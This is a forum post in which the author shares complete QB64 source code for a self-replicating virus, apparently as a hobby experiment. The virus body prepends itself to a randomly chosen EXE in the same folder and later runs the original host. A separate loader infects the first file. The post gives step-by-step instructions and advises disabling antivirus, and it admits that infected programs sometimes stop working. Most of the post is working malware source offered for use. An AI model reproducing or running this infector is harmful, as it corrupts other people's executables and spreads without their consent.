Own Virus wroted in QB64PE - Petr - 03-19-2023
First a warning. Take it seriously. If you accidentally copy an infected file to an unsecured computer with no antivirus, it can and almost certainly will corrupt some of the EXE files in the folder where you put the virus (when you run it). The virus is not able to move over the network or between folders. It's just a piece of software when I tried how it might work.
The virus is written in such a way that it replicates to randomly selected EXE files, but always only to one at a time. This infected file then also replicates the virus after its launch. Sometimes it happens, I did not deal with it in depth, that an EXE file simply does not work after being attacked. It doesn't even make virus copy. I've tested this on EXE copies of many of my old programs from QB64 1.1 onwards.
After the program is started, it informs which file it attacks next, plays the song (PLAY) and then starts the original content in the EXE file. It is the first version (I therefore apologize in advance for the mental damage to experienced programmers) and it will probably also be the last version.
First, compile your own virus - just create an EXE, read the code, but don't run it. In order for the virus to start its peaceful malicious activity, it needs to load into a clean EXE file. A second program (loader) is used for this, but in it, before compiling and running it, modify the path to FILE$ - change the WAV.EXE data to another, depending on which EXE file on your disk you determine to be the victim of the virus.
I recommend trying it in a separate folder, with the antivirus turned off, copy for the virus some EXE files into this folder. Most of them should remain functional after being infect unless they need the other files for their normal operation.
VIRUS BODY (in first use just COMPILE BUT NOT RUN!) by me is this named as Virus24.bas, therefore next source code have FileB$ set as Virus24.exe
Code: (Select All) ' Something from my black programming....I just wanted to try it out
' This program is Virus body. Real, functional (mostly), just for testing function something as this....
' It is my first and i think also last version....
' After program start, read from the end the exe file own array, so know if is quest or host.
' If is quest, print message, play music using PLAY, wait three seconds, randomly selects and attacks another EXE file in the directory.
' Virus attack just ONE random EXE file in ONE RUN, limited to current directory,
' First study this code, then compile it BUT NOT RUN IT.
Type V
id As String * 5 '5 bytes
offset As Long ' 4 bytes
size As Long ' 4 bytes
End Type ' ------------
' 13 bytes
Dim V As V
'------------------- This here is AFTER inection ---------------------------
myexe$ = MyName$
Print myexe$ 'get run file name
Dim TestFirst As String * 13
'read array to find, if this program is infected or not
ff = FreeFile
Open myexe$ For Binary As ff
Get ff, LOF(ff) - 15, TestFirst$
If InStr(1, TestFirst$, "Virus") > 0 Then
Get ff, LOF(ff) - 12, V '
nextexe$ = Space$(V.size)
Print "31"
Get ff, V.offset, nextexe$
End If
If V.id = "Virus" Then Infected = 1 Else Infected = 0
p& = Seek(ff)
If Infected Then
Close ff
GoSub InfectNext
ff = FreeFile
End If
If V.offset = 0& Then Print "jsem v "; MyName$; " a v.offset je 0& ": End 'first use
Print "This file status:"; Infected 'message for user, that this file is infected and music
Print "Virus based on the space language QB64"
Play "t140o2p4g2e4.f8g4o3c2o2b8o3c8d4c4o2b4a8g2."
Sleep 3
ff2 = FreeFile
F$ = "ExportedExeFile.exe"
If _FileExists(F$) Then Kill F$
Open F$ For Binary As ff2
Put ff2, , nextexe$
Close ff2
Shell F$
_Delay 2
Close
Rem Kill F$
System
'---------------------------------------------------- Copy virus to other EXE ----------------------------
InfectNext:
trynext:
myexe$ = MyName$
GetExeList$ = myexe$ + " *.exe"
_ScreenHide
If _CommandCount = 0 Then Shell GetExeList$
_Delay .5
_ScreenShow
Cls
Randomize Timer
back:
FileID = Int(1 + (_CommandCount * Rnd)) 'Randomly find 1 EXE file to attack
If FileID > _CommandCount Then
att = att + 1
If att > 3 Then GoTo f
GoTo back
End If
If att = 3 Then Close: Print "There were 3 attempts to generate an exe for the attack.": System
f:
If _FileExists(Command$(FileID)) = 0 Then Print "file "; Command$(FileID); " not exist": System
'copy virus body for transport to other file
ff = FreeFile
Open myexe$ For Binary As ff
OwnVirus$ = Space$(V.offset)
Get ff, , OwnVirus$
Close ff
fileB$ = Command$(FileID) 'name "original" file
Print "Attacking: "; Command$(FileID)
'get data atacked file
ff = FreeFile
Open fileB$ For Binary As ff
If _FileExists(fileB$) = 0 Then System
'+------------------------
Get ff, LOF(ff) - 12, V
If V.id = "Virus" Then Print "This file is already infected!": End ' why do infect more than 1x?
'------------------------
V.id = "Virus"
Close ff
ff = FreeFile
Open fileB$ For Binary As ff
SizeB& = LOF(ff)
Sizeb$ = Space$(SizeB&)
Get ff, , Sizeb$
Close ff
Kill fileB$
Open fileB$ For Binary As ff
Put ff, , OwnVirus$
V.size = SizeB&
V.offset = Len(OwnVirus$) + 1
Put ff, , Sizeb$
Put ff, , V
Close
Return
Function MyName$
$If WIN Then
Declare Library
Function getCommandLine%& Alias GetCommandLineA ()
End Declare
Dim m As _MEM, P As String
Count = 10
Do Until need > 0 And need2 > 0 'search until string contains not 2x "
P$ = Space$(Count)
a%& = getCommandLine
m = _Mem(a%&, Count)
_MemGet m, m.OFFSET, P$
need = InStr(1, P$, Chr$(34))
need2 = InStr(need + 1, P$, Chr$(34))
Count = Count + 5
Loop
r$ = Mid$(P$, need + 1, need2 - need - 1)
MyName$ = r$
$End If
End Function
VIRUS LOADER (use it for initialize in first use, set correctly File$ (is for clear EXE) and FileB$ (is for virus source code compiled to EXE)
Code: (Select All) 'To make the virus work, you need to install it in a clean EXE file. You will do this with this program.
'Important! The virus part itself must be compiled into an EXE (file virus.exe must exists and not run)
'before running this program, and above all, set up your first host EXE file, which will then pass the
'infection on after running. In this case it is file$, here rewrite the WAV.EXE data to any EXE that
'will be the first virus carrier.
Type V
id As String * 5 '5 bytes
offset As Long ' 4 bytes
size As Long ' 4 bytes
End Type ' ------------
' 13 bytes
Dim V As V
'V.id = "Virus"
file$ = "wav.exe" 'File name - first virus - container SET THIS (your exe file for infect)
fileb$ = "virus24.exe" 'exe file contains own virus SET THIS (virus EXE)
ff = FreeFile
Open file$ For Binary As ff
'+------------------------
Get ff, LOF(ff) - 12, V
If V.id = "Virus" Then Print "This file is already infected!": End 'If is file infected, do not infect it again.
'------------------------
V.id = "Virus"
Close ff
Open fileb$ For Binary As ff
SizeB& = LOF(ff)
Virus$ = Space$(SizeB&)
Get ff, , Virus$
Close ff
Open file$ For Binary As ff
V.size = LOF(ff)
V.offset = Len(Virus$) + 1
original$ = Space$(LOF(ff))
Get ff, , original$
Close ff
Kill file$
ff = FreeFile
Open file$ For Binary As ff
Put ff, , Virus$
Put ff, , original$
Put ff, , V
Close ff
After you compile the first program (the body of the virus), change the paths to file$ and fileb$ in the loader, and run the loader, your first EXE file - the one pointed to by file$ - will be infected. After running this file, it should show a notification about what next file will be attacked, play music, and then start the original program. Everything is done extremely amateurishly, it was just a matter of testing the principle.
|